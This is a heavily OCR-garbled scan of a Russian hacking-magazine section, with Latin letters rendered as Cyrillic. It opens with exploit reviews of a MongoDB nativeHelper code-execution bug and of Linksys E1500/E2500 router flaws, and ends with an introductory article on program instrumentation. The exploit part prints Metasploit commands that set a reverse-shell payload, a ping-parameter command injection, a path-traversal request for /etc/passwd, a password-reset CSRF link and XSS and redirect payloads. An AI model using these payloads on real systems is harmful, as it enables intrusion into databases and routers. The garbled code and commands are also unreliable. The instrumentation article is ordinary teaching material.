СУЕ: 2013-1892 


Мопоо0В содержит ошибки в функции пабуеНерегарру Ч/$-движка 
ЗрюаегМопкеу, который используется в БД. Баг позволяет атакующему вы- 
полнить произвольный код через метод гип(). Сам метод используется вну- 
три клиента, например: 

> гип("ипате" ,"-а" 

5ип Маг 24 07:09:49 $Пе1]: $фагфе рговгат ипаме -а 

511838| 11пих топ?о 2.6.32-5-686 #1 $МР ип $ер 23 09:49:36 + 
ИТС 2012 1686 СМУ/Ё1пих 


Если мы попытаемся удаленно вызвать этот метод, то получим ошибку: 


> АБ.ту_со11есЕ1оп.Япа ( {$мПеге : "гип("15')"}) 
еггог: { 


"Фегг" "еггог оп 1пуосаЕ1оп оф $ийеге ФипсЕ1оп: \пЭ$ += 
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Еггог: ВеРегепсеЕггог: гип 1$ поф дейпед поЯ1е_а:0", 
"сое" : 10071 


| 


При более близком рассмотрении гип мы видим, что паёуеНерег вызыва- 
ется с переменной гип_: 


> гип 
ФипсЕ Топ () { 
гефигп па 1уеНе1рег.арр1у(гип_, агвитепт®$); 


} 


Попытаемся запустить со стороны сервера, зная эти нюансы: 


> аБ.ту_со11есЕ1оп.йпа ( {$ипеге : 'па1уеНе1рег.арр1у(гип_, += 
["чпате" ,"-а"]); ие 


еггог: { 

"Фегг" "“еггог оп 1пуосае1оп оф $ийеге ФипсЕ1оп:\п35 += 
Еггог: КефРегепсеЕггог: гип_ 1$ поф аейпеа += 
пой1е_а:0", 

"сое" : 10071 

} 


Что же кроется за переменной гип_: 


> гип_ 
{ "х" : 135246144 } 
Получается, что здесь массив, попробуем изменить его: 


> АаБ.ту_со11есЕ1оп.Япа ( {$ипеге : 'паЕ1уеНе1 рег .арр1у-=_ 
({"х":135246144}, ["ипате" ,"-а"]);'}) 


08ВС11епСиг5ог: :1п1% са11() Фа11еа 

дчегу №а11еа : ${ПВаск.ту_со11есЕ1оп { ‹* 
финеге: "па&1\уеНе1рег.арр1у({"х" :135246144} , 
"-а"]);" } о: 127.0.0.1:27017 

Еггог: еггог 401п8 диегу: Фа11еа 

Егу1пё гесоппесе Фо 127.0.0.1:27017 
гесоппест 127.0.0.1:27017 Ра11е соч1ап'Е соппесЕ фо зегуег += 
127.0.0.1:27017 


"ипате" ‚, == 


В итоге наш сервер падает! Чтобы понять, из-за чего это происходит, рас- 
смотрим исходники файла ../топао/зсирипа/епате_зраегтопкеу.срр: 


75$Воо1 па{1\уе_пе1рег(_Э5$СопфехЕ *сх, Э5О0Бдесе *об], и1и®М «= 
агёс, ]5\а1 *аг8\у, ]5\уа1 *г\а1 ) { 
Еву 4 
Сопуегфог с(сх); 
МаЕ1уеРипс Топ Фипс = ге1зиегрге*_са$*( 
5фа*1с_са5*(_с.реЕМитЬег( об, "х" ) ) ); 
\014* дафа = ге1пфегрге*_са$*<\о1а*>( 
$фа*1с_са5*(_с.реЕМитЬег( об, "у" ) )); 
мег1Ру( Фипс ); 
В$ОМОБ] а; 
1+ ( агвс > 0) { 
В$0М06]Ви11Аег аг55; 
Фог ( ч1"М 1 = 0; 1 < агрс; ++1 ) { 
с.аррепа(_аг=5$, агв$5.пит5г(_1 ), агв\у[1] ); 


} 

а = аг25.063(); 
} 
В$0№063 оит; 
ны 


оиЕ = Рипс( а, аажа ); 


сафесй ( $4: :ехсер{1оп& е ) { 
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Каквидим, МануеРипсйопТиптс приходитиз/$-объекта ивызывается без про- 
верки. Например, попробуем передать какой-нибудь адрес: 


> а6.ту_со11есЕ1оп.впа ( {Фипеге : 'паф1уеНе1 рег. = 
_ арр1у({"х" :0х31337}, ["ипате" ,"-а"]); '}) 


Тпуа119 ассез$ аф адагезз: 0х31337 +гош +Нгеа4: сопп1. 
СОЕ $12па1: 11 (Зевтепфа{1оп Фау1*). 


ЕХРЕСО!Т. Уавтора эксплойта довольно подробно расписан процессего соз- 
дания: БИ.1у/\ЕЗпС, амы можем воспользоваться уже доведенным автором 
же доума модулем для Маазр!ок: 


15+ > ие ехр101{/11пих/т1$с/топёо04_па*1\уе_пе1рег 
15+ ехр101+{ (топ5о4_па*1\е_Пе1рег) > $Иом рау1оаа$ | 
15+ ехр101* (мопво4_па{1уе_пе1рег) > её РАУГОАО вепег1с/- 

| | $йе11]_геуег$е_ ср И 
15+ ехр101+4 (топ04_па*1\е_Пе1рег) > зеф 1НО$Т 192.168.24.141 _ 
15+ ехр101*(топ5о4_па{1уе_Не1рег) > зе{ф ВНО$Т 192.168.24.142 — 
1$ ехр101+ (топёо49_па{1\е_пе1рег) > ехр1о1* 


ТАВСЕТЗ. До МоподоОВ 2.4.0 включительно. 


ЗОБУТОМ. Есть обновление, устраняющее проблему. 


МНОГОЧИСЛЕННЫЕ УЯЗВИМОСТИ 
ВЕ1500/Е2500 


С\$$у2: 9.0 (АМ:В/АС:/Аи: ЗИС:СЛ:С/А:С) 
Дата релиза: 5 февраля 2013 года 

Автор: Меспае! Меззпег 

СУЕ: М/А 


Различные роутеры Ипк$уз$ от С!5со содержат уязвимость, приводящую квы- 
полнению произвольного кода. Ошибка происходит из-за недостаточной 
проверки параметра ртд_$хе, который далее попадает в скрипт /арру.сот, 
что позволяет атакующему инжектировать различные команды. Сложность 
эксплуатации заключается в том, что злоумышленник должен быть залогинен 
либо должен использовать этуошибку совместно с другими уязвимостями, на- 
примертипаС$НЕ Следующийуязвимый параметр — пех{ раде.Онпозволяет 
читать любые файлы устройства. Остальные уязвимости.:. 


ЕХРЕС!Т. Атаку можно провести какчерезРОЗТ-, такичерез СЕТ- 
параметры: 


$ибт1 Би оп=01апо${1с5&сПапре_ас{10п=50711а_с51&5$ибт1 «= 
фуре=$5Фаг*_р1п58ас 10 п=&сотт1{=0&р1п=_1р=1.1.1.1&р1п5_‹ = 
$176е=%26р11п5%20192%2е168%2е178%2е102%26&р1п5_+1тез=+ 
5&{гасегои*е_1р= 


Далее уязвимостьтипа «раскрытие путей» через параметр пех! раде. 


РОЗТ /арр1у.с=1 НТТР/1.1 
НозТт: 192.168.178.199 


зи _фуре=мзс_ме+под2&сНапре_ас+1оп=Е0711а_се18пехЕ_раре=» _ 


../../ргос/мег$1оп 
В ответполучаем: 


НТТР/1.1 200 ОК — 


ЕЗпих уег$1оп 2.6.22 (с1с@+.5м3) (всс мег$10п 4.2.3) & 
#10 Тпи Ацв 23 11:16:42 НКТ 2012 


Следующая уязвимость позволяет сбросить пароль, не зная старого. Так- 
же этуатаку можно провестичерезС$ВЕ подсунув админу ссылку вида: 


Пер: //<ТР>/арр1у.с51?5и6т1{_Би{Фоп=Мапаретеп&сПапзе_ас1оп=«= 
&асЕ1оп=Арр1у&Ра$$мМоЧ1Ту=18&И{р_епаб1е=1&И{р$_епаб1е=е- | 
0&с+т404_епаб1е=&гето{е_т8*_ПЕр$=08ма1{_11те=4&пеей_гебоо*=+ 
9&ИЕЕр_ра$$м9=адт1п&ИЕЕр_раз$мЧСопйгт=адт1п&_Ир_епаб1е= 
18меб_м1_Я1{ег=0&гето®е_тапаретеп*=0&п{_а18_$1р=@&ирпр_епаб1е=+= 
1&ирпр_сопй5=1&ирпр_1п{егпе*_41$=0 
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Тагое{ 


Нозе |192.163.178.199 


| со -| Сапев 


РОЗТ Гарр!у.са1 НТТР/Т.1 

Нозе: 192.168.178.199 

Узег-Адепе: Но:111а/ 5.0 (У109оуз НТ 6.1: УОЧЕЯ; гу:16.0] бесКко/ 20100101 Р1ееох/ 16.0 
Ассере: сехе/ но, арр1 1сас1оп/ хЬст1+хт1 , арр11сас1оп/хи1; 420.9, */*;=0.8 
АссерЕ-Бапоцаае: 4-е, де; 0,8, еп-0а;: 40,5, 2е1:40.3 

АссерЕ-Епсод1ла: ст1р, @е1асе 

РЕоху-Соппесе10т: Кеер-а1 уе 

Веёесее: НСЕр://192.168.178.199/У1е1езз Ваз1с.азр 

АНЕПОЕ1Еастоп: Ваз1с тТурсаиЗЕТиргаАЫе 

Сопсепе-Туре: арр11сас1от/х-ччу-Роеи-ие 1епсоде4 

Сопселе-ЬераеН: 75 


эщыю1с суретузс шесво42 ссвапое ас101=00:11а сф6пехе раде=т../../есс/раззу 


[абы [5 | [+ | [223] | Туре а эевлсй {ето 


НТТР/1,1 200 ОК 
заруее: НЕсрЯ 
Васе: Таи, 01 Чап 1970 00:08:51 СИТ 
Сасне-Соперго!: по-сасНа 

Реасаа: по-сасйе 

Ехр1еез: 0 

Сопеепе-Туре: сехе/вЕм 

Соппесс10й: 2108 


ГОО: :0: О: коб: /: /Бапу зн 


Пример эксплуатации уязвимости типа «раскрытие путей» вроутере ЕЛ! 500 


Инжектируем О$-команды в роутер ЕЛ1500 


Необошлосьи безХ$$-уязвимости, которая находится в параметре 
май _{ите: 


ма1_%1те=3 '%3ба1ег*('рмпа') // 


Нуивзаключение приведу интересный трик — редиректпользователя на 
любую страницу при нажатии кнопки: 


$ибт1* _Биоп=Н р: / /ммм. рипа. рипа%9а&ас*1оп=Арр1у&+= 
5ибт1*_фуре= 


Также существует модуль для Мщазр/он. 


ТАВСЕТФ. 
Чпк$у$ Е1500 1.0.0-1.0.05. 
Чик5у$ Е2500. Тестировалосьтолько на 1.0.03. 


ЗОШОТОМ. Есть обновления. = 
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Вобем $5. Вопоуап @ Яскг.сот 


ЭВОЛЮЦИЯ АНАЛИЗА 


Основы основ об инструментации 


Все больше, все сложнее и все динамичнее по своему исполнению становятся современные 
приложения. А с ростом сложности программ возрастает и сложность написания инструмен- 
тов для их анализа. Чтобы упростить анализ, на помощь приходит так называемая инструмен- 
тация, о которой сегодня и пойдет разговор. 


У 


Дмитрий «0191» 
Евдокимов, О10На! ЗесигНу 
@е\удоКтоу4$ 


ПРЕДВАРИТЕЛЬНАЯ ЗАГРУЗКА 

Инструментация — для многих новое слово. Это процесс мо- 
дификации исследуемой программы с целью ее дальнейшего 
анализа. Тема обширная, поэтому сегодня мы только начнем 
с ней знакомиться. 

В рамках курса мы окунемся в мир инструментации: узна- 
ем, как упростить жизнь при фаззинге, выявлении возмож- 
ности эксплуатировать уязвимость, написании эксплойта. 
И конечно, уделим особое внимание теме динамической би- 
нарной инструментации (ОВ, Вупапис Втагу пзкитетаноп). 
Всего будет три статьи. В первой мы поговорим о классифи- 
кации методов инструментации. Во второй познакомимся 
с фреймворками для динамической бинарной инструментации 
(Рупато НО, Буптз$, Уаюдипа, РИМ). А в третьей рассмотрим, 
как можно использовать фреймворк РИМ в области информаци- 
онной безопасности. 

Сегодня мы начнем с самых базовых вещей. Ты узнаешь: 

каковы преимущества динамического анализа приложений 

над статическим; 

из чего состоит динамический анализ и какие задачи 

он решает; 

какие бывают виды инструментации; 


что такое инструментация исходного кода, байт-кода и би- 
нарного файла (и какие инструменты для этого применя- 
ются); 

как проводится статическая и динамическая бинарная ин- 
струментация. 


ЗТАТ!С \$ БУМАМ!С 

При анализе программ есть два возможных сценария: когда 
унас есть исходный код приложения и когда у нас его нет. В боль- 
шинстве случаев исходный код исследуемого приложения от- 
сутствует, что при статическом анализе исполняемых файлов 
приводит к появлению целого ряда проблем. Например, невоз- 
можности отличить данные от кода, что, в свою очередь, ведет 
не только к неполному анализу, но и к получению ложных дан- 
ных. А если исследуемая программа использует динамически 
генерируемый код, то даже наличие исходников не даст полную 
картину ее работы. 

Современные приложения все чаще собираются и опреде- 
ляются во время своего выполнения, используя разделяемые 
библиотеки, виртуальные функции, подключаемые плагины, 
динамически генерируемый код и прочие динамические ме- 
ханизмы. Поэтому количество получаемой с помощью ста- 
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КРИТЕРИЙ СТАТИЧЕСКИЙ ПОДХОД ДИНАМИЧЕСКИЙ ПОДХОД 


Покрытие кода Большое покрытие кода Выполненные пути 
Самомодифицирующийся код Проблема Нормальная работа 
Неиспользуемый код Анализируется Отбрасывается 
тического анализа информации об исследуемой программе Сравнение динамиче- не имеют исходного кода программ, а влиять на их выполнение 
со временем становится все меньше и меньше. Статические ского и статического для сбора информации и последующего анализа как-то надо. 
инструменты уже не способны дать даже полного покрытия подхода при отсут- Иными словами, это может понадобиться для: 
кода, что раньше было их неоспоримым преимуществом, не го- ствии исходного кода . трассировки вызовов; 
воря уже о невозможности точно отличать данные от кода. . анализа потока данных (аит-анализ); 
В связи с этим появляется четкая необходимость в мощном ди- . анализа потока управления (соде соуегаде); 
намическом подходе, сочетающем в себе простоту реализации . обнаружения уязвимостей; 
и хорошую производительность. . определения условий возникновения уязвимостей (аоцЫе 
ее, гасе сопаШоп, дапата роищег, тетогу1еак); 
ЧТО? КАК? ЗАЧЕМ? . обнаружения неизвестных уязвимостей (повреждение 
Динамический анализ программ можно разделить натри основ- адреса возврата и так далее); 
ных этапа: . Ффаззинга (генерация {е$ сазе’ов, п тетогу №и77т0); 
. инструментация приложения; . временного закрытия уязвимостей (уиа! расйпод); 
. профилирование приложения; . обнаружения шелл-кодов; 
. анализ полученной информации. . реверс-инжиниринга; 
. безопасности на основе поведенческого анализа (создание 
На первом этапе идет подготовка приложения к профилиро- профиля легитимной работы); 
ванию — инструментация. Затем запуск, и уже при выполнении . создания песочницы. 
накапливается информация о работе приложения. Собранная 
информация представляет собой трассу приложения (список ВИДЫ ИНСТРУМЕНТАЦИИ 
выполненных инструкций программы), которая затем обраба- Для составления полной картины об инструментации кода рас- 
тывается. Пока мы рассмотрим только первый этап анализа. смотрим все ее виды. В этом нам поможет следующая класси- 
Как уже говорилось, инструментацией называют процесс фикация: 
модификации исследуемой программы. За вставку допол- 1. Исходные данные: исходный код, байт-код, исполняемый 
нительного кода обычно отвечают инструментирующие про- файл. 
цедуры. Они вызываются только раз при возникновении не- 2. Объект изменения: исходный код, компилятор, исполняе- 
обходимого события и модифицируют целевую программу, мый файл, процесс, интерпретатор / виртуальная машина, 
добавляя в нее анализирующие процедуры, которые отвечают среда выполнения, архитектурные возможности аппаратно- 
за необходимый анализ, изменение и мониторинг исследу- го обеспечения. 
емой программы и вызываются каждый раз при достижении 3. Технология изменения: инструментация исходного кода, ин- 
определенного участка кода. Инструментация бинарного при- струментация кода компилятором, статическая инструмен- 
ложения может быть выполнена на разных уровнях грануляр- тация кода, динамическая инструментация кода, отладчики, 
ности программы: воспроизведение работы среды, возможности по отладке, 
. инструкции; предоставленные аппаратным обеспечением. 
. базового блока; Классификация мето- 4. Способ достижения технологии: ручная/автоматизирован- 
. трассы; дов инструментации ная вставка анализирующих функций, настройка компиля- 
. процедуры; 
. секции бинарного файла; 
. бинарного образа. 
Инструментация 


Анализирующие процедуры обычно реализованы в виде 
процедур обратного вызова, которые срабатывают при дости- 
жении определенного участка кода или когда в программе про- 

б Без исходного 
исходит заданное событие. С исходным кодом кода 

Для создания таких инструментов, работающих во время 
выполнения программы, были разработаны специальные на- 


боры библиотек динамической бинарной инструментации. Ин- Исходный код 

струменты же, которые с их помощью можно создать, называ- Байт-код Бинарный код 

ют динамическими бинарными анализаторами (ОВА, ОБупаптс Компилятор 

Впагу Апа!уз1$). Ими уже достаточно давно пользуются про- 

граммисты и тестировщики для решения целого ряда повсе- Байт-код Бинарный код 

дневных задач: моделирования, эмуляции, анализа произво- 

дительности, проверок правильности работы, отладки памяти, Интерпретатор Процесс 

параллельной оптимизации, построения графа вызовов, сбора 

метрик кода, автоматической отладки. Среда выполнения 
Эти наборы библиотек также хорошо подходят и для задач, 

решаемых специалистами по информационной безопасности, Аппаратные 

администраторами, людьми, ищущими уязвимости, и анти- возможности 


вирусными аналитиками. Так как обычно данные специалисты 
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тора, статическая бинарная инструментация, модификация 
загрузчика, эмуляция, виртуализация, паравиртуализация, 
патчинг статическая бинарная инструментация, динамиче- 
ская бинарная инструментация, отладочный АР! ОС, эмуля- 
ция работы оборудования, отладочные регистры процессо- 
ра, аппаратные отладчики. 


Из приведенной классификации видно, что исходные дан- 
ные (то есть то, что мы начинаем исследовать) могут быть пред- 
ставлены в одном из трех возможных видов: 

. ИСХОДНЫЙ КОД; 
. байт-код; 
. исполняемый бинарный файл. 


Ситуация, когда доступен исходный код, возможна, только 
если ты являешься автором проекта или исследуемый проект 
опенсорсный. При этом возможно проанализировать толь- 
ко ту часть приложения, исходный код которой присутству- 
ет, — проанализировать сторонние (например, системные или 
чужие) библиотеки невозможно, так как их исходники почти 
всегда отсутствуют. Значительный плюс наличия исходников 
исследуемого приложения — полное знание о его высокоуров- 
невом устройстве (названия переменных, типы переменных 
и так далее). Обратной стороной этого является полное отсут- 
ствие низкоуровневой информации (значение регистров, фла- 
гов, представления, как данные хранятся в памяти, итак далее). 

Байт-код — машинно-независимый код низкого уровня, ге- 
нерируемый транслятором и исполняемый интерпретатором / 
виртуальной машиной. Большинство инструкций байт-кода 
эквивалентны одной или нескольким командам ассемблера. 
Трансляция в байт-код занимает промежуточное положе- 
ние между компиляцией в машинный код и интерпретацией. 
С ним можно встретиться при анализе программ, написанных 
на Чауа/С#. 

Наличие только исполняемого бинарного файла — наи- 
более часто встречаемая ситуация, тем более при работе ис- 
следователя информационной безопасности. В этом случае 
уже хорошо, если для исследуемой программы доступны хотя 
бы отладочные символы. К данной категории в основном отно- 
сятся приложения, написанные на компилируемых языках про- 
граммирования, то есть когда компилятор переводит исходный 
код непосредственно в машинные команды. 

Рассмотрим подробнее, как происходит инструментация 
в каждом из этих трех вариантов. 


ИНСТРУМЕНТАЦИЯ ИСХОДНОГО КОДА 

Инструментация исходного кода представляет собой встав- 
ку анализирующих функций непосредственно в исходный код 
программы. После компиляции и запуска программы вставлен- 


Пример модифицированного 
инемодифицированного ис- 
полняемого файла с исполь- 
зованием перевыделения 


Инструментация — эволюция анализа 


ШМЕО 


План курса: 
- Классификация мето- 
дов инструментации 


- ОВ!-фреймворки 
(Оупато[!О, Эупп$1, 
\Уадипа, РИМ) 


. Использование РИМ 
для исследования без- 
опасности 


Модифицированный 


заголовокфайла 
Заголовок файла 
АО 
Сегменткода Сегменткода 
р 
Сегмент данных Сегмент данных 
о 


Дополнительный 
сегмент кода 


Дополнительный 
сегмент данных 


УТ 


ные анализирующие функции выполнятся и выдадут результат 
работы. 
Исходный код в общем случае можно проинструментиро- 
вать двумя путями: 
Вручную: 
. программист сам вставляет в нужные места необходимые 
функции. 


Автоматизировано: 
. спомощью инструментов среды разработки; 
. спомощью параметров компилятора. 


Рассмотрим в качестве примера инструментацию с помо- 
щью компилятора ССС, который позволяет инструментировать 
исходный код программы на уровне функций и предоставляет 
специальные функции и опции компилятора. Например, опция 
—пизгитет-ГопсНоп$ отвечает за создание инструментирую- 
щих вызовов для входа в функцию и выхода из функции. То есть 
сразу после входа в каждую функцию программы и перед вы- 
ходом из нее располагаются профилирующие функции, в ко- 
торые передается адрес текущей функции и место, откуда 
произошел вызов. Эти профилирующие функции имеют сле- 
дующий вид: 


\014 __суё_ргой1е_Фипс_епег (\уо1а *{115$_4п, += 
№014 *са11]_$1%е); 
\014 __су=_ргой1е_Фипс_ех1* (\014а *%115$_4п, + 
№014 *са11_$11е); 


Исходный код приложения, которое подверглось 
инструментации в 6СС 
#1пс1иае <5а1о.1> 
\01 __суё_ргой1е_Фипс_епфег (\ио1а *%015$_4п, += 
\01 *са11_51%е) 
__ аЕг1и{е___( (по_1п5&гитеп*_ФипсЕ1оп)); 
\01 __ су _ргой1е_Фипс_епфег (\ио1а *%115$_Фп, += 
\О14 *са11_$1%е) { 
рг1п+("ЕМТЕВ: %р, Фгот %р\п", %01$_4п, += 
са11_$1{е); 
в гой1е_Фипс_епфег * 
\014 __су=_ргой1е_+Фипс_ех1(\мо1а *%И15$_п, «= 
\0О14 *са11]_51%е) 
__ аг1Би{е___( (по _1п5&гитептЕ_ФипсЕ1оп)); 
№014 __су=_ргой1е_+ипс_ех1*(\мо1а *%015$_п, += 
\О1 *са11_51%е) { 
рг1п + ("ЕХТТ: %р, гот %р\п", %01$_4п, + 
са11 _$1{е); 
} /* _ суё_ргой1е Фипс_епжег */ 
Ти Фоо() { 
гефигп 2; 
И 
1иЕ Баг() { 
РесыРИ 1; 


} 
1 та1п(1пЕ агёс, спаг** агё\у) { 
рг1пЕ+("Роо=%а Баг=%а\п", Фоо(), Баг()); 


} 


В 0$ Х существуют аналогичные функции, которые назы- 
ваются ргоНе Типс_ еще) и ргоНе Типс_ехц(). Преимущества 
и недостатки инструментации исходного кода: 

+ точность анализа 

+ доступность большего количества высокоуровневой инфор- 
мации 

+ простота реализации 

— необходимость перекомпилирования при изменении ана- 
лизирующей функции 

— необходимость наличия исходного кода 

— отсутствие возможности анализировать ЛТ-код 


Очевидно, что самый большой недостаток данного под- 
хода заключается в обязательном наличии исходного кода, 
что в большинстве ситуаций, с которыми сталкивается специ- 
алист по информационной безопасности, просто невозможно. 
Однако данный способ отлично подходит для программистов, 
желающих отладить свои приложения. 
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Нас же, как ты уже понял, больше интересуют способы ди- 
намического анализа кода, которые не требуют наличия исход- 
ников и дают возможность исследовать сторонние легитимные 
приложения и вредоносное программное обеспечение. 


ИНСТРУМЕНТАЦИЯ БАЙТ-КОДА 
При наличии только лишь байт-кода инструментация произ- 
водится другими способами, так как имеющееся промежу- 
точное представление, перед тем как выполниться, загру- 
жается в виртуальную машину (ВМ) и уже там переводится 
в машинные инструкции и выполняется в операционной си- 
стеме. В связи с такой схемой выполнения программы воз- 
никают и соответствующие проблемы: 
отладка приложений, работающих через интерпретатор / 
виртуальную машину, крайне тяжела по сравнению с отлад- 
кой обычных приложений; 
вся логика инкапсулирована внутри виртуальной машины; 
уязвимостями обычно являются ошибки в сгенерирован- 
ном УП-коде; 
ручная отладка и трассировка неправильного сгенериро- 
ванного ЛТ-кода непрактична. 


Что же касается инструментации байт-кода, то она может 
происходить на следующих стадиях: 
До запуска: 
статическая инструментация: файл с байт-кодом инструмен- 
тируется до его загрузки в ВМ. Например, создается копия 
файла и затем изменяется добавлением инструментации. 


Во время загрузки байт-кодав ВМ: 

инструментация на этапе загрузки: возможно написание 
собственного загрузчика байт-кода в ВМ, который в про- 
цессе загрузки и будет производить инструментацию кода. 


Во время выполнения: 
динамическая инструментация: байт-код, который уже за- 
гружен и, возможно, даже запущен, модифицируется. 


ИНСТРУМЕНТАЦИЯ БИНАРНОГО КОДА 
Ну и последний вариант, когда на руках у нас только сам испол- 
няемый файл. Для его анализа мы можем влиять на него непо- 
средственно (вставить в файл инструментирующий код, а затем 
запустить) либо в процессе работы (на процесс), на программ- 
ное окружение, в котором он выполняется. Также мы можем ис- 
пользовать архитектурные возможности аппаратного обеспе- 
чения, на котором анализируется приложение. Все варианты 
можно представить в виде следующего списка: 
Исполняемый файл 
Статическая инструментация кода 
Статическая бинарная инструментация 


Унифицированная 
модель выполнения 
байт-кода 
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Вся информация предо- 
ставлена исключительно 
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целях. Ни редакция, 
ни автор не несут от- 
ветственности за любой 
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чиненный материалами 
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ИНСТРУМЕНТАЦИЯ 
ИСХОДНОГО КОДА 


1. \Мзиа этиаю РгоШег — 6и.1у/101УВгО 
2. ССС — асс.дпи.ога 

3. ТАЧ — БЧЛу/ТЕМИУЧ 

4. ОРАН — БИЛу/7АО17с 


5. ОаБо — БК.у/пмими М8 @ 

6. Рпоепх — Би./у/ВУМ/М 

7. ШУМ — Пут.ога 

8. РАаНопа! РийРу — Ют.со/2ааоЕ7 

9. Уаюдипта — уааипа.ога 

10. АдагезЗапщхег (АЗап) — БИЛу/уоЕМ!с 


ИНСТРУМЕНТАЦИЯ 
БАИТ-КОДА 


ВеРгатемюогкег — 6и.1у/160го14 (.МЕТ) 
Чама$я1${ — Би./у/2хпа\$ (Чама) 
ОБесиМеб АЗМ — азт.о\м/2.ога (Чама) 
Вуе Соде Епатеегта Мбгагу (ВСЕ) — 
он.!у/1ЗВа\9 (Фама) 

Тре Мсгозой В\есоае Епатеептпа Ибгагу 
(МВЕГ) — БИ.Иу/УММоМ42 (.МЕТ) 
уама$поор — БН.[у/аСУА82 (Чама) 

ге/ — Би.[у/обк$р] (Чама) 

Зегр — БИ. /у/аахОгВ (ама) 

Випйте АззетЫу п{гитетаноп Ибгагу 
(ВАШ) — ган.аег!.ис.р\ (.МЕТ) 

10. Сесй — БИ.у/АТЮУтЕ (.МЕТ) 


1. ЧОЕ — БК. у/1ЗВиССт (фама) 
12. ЛМапаег — ви. /у/итамии (Чама) 


= 


> 


СТАТИЧЕСКАЯ БИНАРНАЯ 
ИНСТРУМЕНТАЦИЯ 


Примеры инструментов: 

Оупт$ Е — ммм. ауптз{. ога 
ЕЕ — БК.|УЛМ7УМА$ 

АТОМ — 6{.1у/1714$59 

РЕВ — ОК.!у/16КОпук 

ЕВЕЗ! — БК.1у/уР5Ох 

ТАЧ — БкЛу/ТЕМУму 

Мисап — 6(./у/115Ца5 

ВАО — ОК./уЛУМостий 

Азап (4514М) — Би./у/957МР 


В о 


ДИНАМИЧЕСКАЯ БИНАРНАЯ 
ИНСТРУМЕНТАЦИЯ 


1. РИМ — ммм. ртюо1.ога 

2. Оупато ЮО — дупатопо.ога 
3. ОБуптз{ — мумии. уп. ога 

4. \Уадипа — уачипа.ога 

5. ВАР — Бар.есе.сти.еи 

6. КЕОН — Кеаг.регоз.ае 

7. ЕНВЕЗ! — м/ммм/.еге$!-ргоест{.ога 
8. Баоицг$ — Би.у/Литу 

9. УМуёсап — 6{.1у/1151а5 

10. ЗраегРю — о(.1у/1А пм г 
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Процесс 
’ Динамическая инструментация кода 
. Динамическая бинарная инструментация 
. Перехват таблицы вызовов 
‚ АГ 
‚ Отладчики 
. Отладочный АРГОС 


Среда выполнения 
. Перехват таблицы вызовов 

. ОТ СРУ М$В$, СОТ, 5$ЗОТ, 1АР-таблица 
. Воспроизведение работы среды 

. Эмуляция 

. Виртуализация 


Архитектурные возможности 
. Возможности по отладке, предоставленные аппаратным 
обеспечением 
. Отладочные регистры процессора 
. Аппаратные отладчики 


Здесь нас интересуют два варианта — это статическая и ди- 
намическая бинарная инструментация. Рассмотрим их подроб- 
нее. 


СТАТИЧЕСКАЯ БИНАРНАЯ ИНСТРУМЕНТАЦИЯ 
Статическая бинарная инструментация кода заключается во 
вставке, изменении или удалении определенной функцио- 
нальности в бинарном исполняемом файле, находящемся 
на диске, и сохранении получившегося файла в виде отдель- 
ной копии. После чего можно запускать модифицированный 
файл. При данном подходе получается, что инструментация 
проводится всего лишь один раз, а использовать ее можно 
многократно. Накладные расходы при таком подходе во вре- 
мя выполнения программы связаны только с выполнением 
вставленного кода. 

При статической бинарной инструментации инструменти- 
рующая программа, в зависимости от ее реализации, может 
влиять: 

. на заголовок исполняемого файла и сегмент кода и/или 
данных; 
. сегмент кода и/или данных. 


Данный подход также иногда еще именуют физической инте- 

грацией кода или статической бинарной перезаписью. 
Статическую бинарную инструментацию также можно 

классифицировать по использованию так называемого пере- 
выделения: 

. с перевыделением: заключается в создании нового сег- 
мента кода, куда переносится инструментируемая функ- 
ция с уже вставленными участками анализирующего кода. 
Обычно перевыделение происходит на уровне функций, из- 
за наибольшей простоты и практичности. Для этого в начале 
оригинальной функции вставляется переход на проинстру- 
ментированную; 

.‚ без перевыделения: при таком подходе анализирующий код 
интегрируется в оригинальный код, что в большинстве слу- 
чаев влечет за собой почти полную пересборку бинарника. 


Инструментация — эволюция анализа 
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Правда, у статического метода остается проблема от- Вставка кодав запу- 
личия данных от кода, так как инструментация выполняется щенную программу 
Программа Базовый батут Мини-батут Функция 
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Перемещенные 
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Возвращение 


Установка аргументов 
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Восстановление 
регистров 


Сохранение регистров 


до выполнения программы. Кроме этого, недостатком еще 
является то, что разделяемые библиотеки необходимо ин- 
струментировать отдельно, в то время как при динамической 
бинарной инструментации инструментируется весь выпол- 
няемый код. Статические анализаторы также обеспечивают 
меньшую гибкость для разработчиков инструментов, по- 
скольку любой инструментирующий код сохраняется в тече- 
ние всей работы приложения, в то время как динамический 
инструментарий предоставляет средства для удаления или 
изменения такого кода по мере необходимости. 

Можно сказать, что статическая инструментация похожа 
на статическую трансляцию кода (когда код из одного пред- 
ставления транслируется в другое). 


ДИНАМИЧЕСКАЯ БИНАРНАЯ ИНСТРУМЕНТАЦИЯ 
Динамическая бинарная инструментация выполняется 
во время работы программы и состоит из нескольких базо- 
ВЫХ СОСТОЯНИЙ: 

. получение управления от приложения; 

. сохранение состояния программы; 

. выполнение задач; 

. восстановление состояния программы; 

. возвращение управления приложению. 


Получение управления от приложения обычно происхо- 
дит с помощью сплайсинга Агатроте/по{-раёспто’а, реали- 
зующих перезапись текущих инструкций, с их сохранением 
в определенном месте: 

. наинструкцию передачи управления (]тр); 
. функциональный кусок кода ($трре{5). 


При перезаписи инструкций играет важную роль, на какой 
платформе это происходит, так как все платформы по типу 
инструкций делятся на две категории: 

. с фиксированной длиной инструкций: в этом случае при пе- 
резаписи инструкции на инструкцию передачи управления 
всегда переписывается только одна инструкция. Примеры 
таких платформ — АВМ и $РАНС; 

. спеременной длиной: в данном случае при перезаписи ин- 
струкции на инструкцию передачи управления может пере- 
писаться несколько инструкций (при этом последняя не пол- 
ностью), что вносит определенные трудности. Примерами 
таких платформ являются х86 и х86-64. 


Данный подход также называют физической интеграцией кода 
или динамической бинарной перезаписью. 

Преимущества и недостатки динамической бинарной ин- 
струментации перед статической: 
нет необходимости в перелинковке и перекомпиляции 
обнаружение кода в процессе выполнения 
обработка динамически генерируемого кода 
присоединение к запущенным процессам 
анализ всего приложения как единого целого 
— увеличение накладных расходов 
— сложность реализации 


+++ 


Увеличение накладных расходов связано с тем, что во вре- 
мя динамической бинарной инструментации, помимо вставки 
анализирующих функций, также производятся задачи раз- 
бора (парсинга), дизассемблирования, генерации кода и так 
далее. Данные недостатки со временем становятся все менее 
заметными, так как снижение производительности устраня- 
ют использованием кеша и оптимизирующими алгоритмами. 
А для реализации динамической инструментации создают 
специальные программные библиотеки с достаточно простым 
и удобным АР. 


КОНЕЦ МАТЧАСТИ 

Вот мы и рассмотрели, какие бывают виды инструментаций, 
